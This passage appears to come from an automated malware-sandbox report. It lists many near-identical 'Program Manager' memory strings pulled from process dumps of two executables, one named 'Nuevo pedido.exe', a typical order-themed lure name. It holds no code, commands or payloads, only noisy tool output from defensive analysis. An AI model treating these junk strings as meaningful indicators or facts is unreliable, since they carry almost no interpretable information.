                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qle
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4\s
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpu/
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\*Z
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\,!
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd}J
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd],
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q W7
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|m&
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q7Y
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8ej
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXc$
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q sk
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd7n
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@S*
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@sH
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q9B
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD9G
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q9?
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q9N
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8 X
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD:"
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<k;
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtXk
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|&r
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLJF
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdy`
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,+&
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLjd
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXq
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(c`
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT|,
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(">
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLK!
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXy
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLIZ
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q 3/
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q${s
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8!D
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|I
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh!6
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH m
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|IL
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|).
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPRS
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHd)
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\3
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXcR
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD;<
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|3
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8"M
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q TV
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh J
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8z
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT[E
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q::
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qps:
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPS?
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT[C
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\(e
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q zS
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPXA
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`6Q
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlO@
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlq%
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD@/
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q2f
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q087
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`7=
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`y@
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qF
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`Y"
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPX2
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd`*
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8I6
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<PW
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlNT
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXi1
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8(,
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPXD
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8HJ
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDaV
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH'U
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT\
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp6f
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(k4
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxFp
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPyY
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<QC
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql0+
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<qa
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qvE
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLPl
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,t-
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|-_
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDbB
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$C"
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhGP
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH(A
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$c@
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt`?
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxhC
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q</r
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$A[
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|Ni
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q</o
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPzE
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0[%
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPV=
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(h6
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qV@
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,oW
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlL_
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q05V
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@wD
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPUQ
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(gJ
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlmi
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@wA
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8FU
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL,d
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,pC
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTv
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD^X
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh$4
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPx"
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<ol
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxA
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt~h
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\p5
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8GA
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt>,
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,No
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhfe
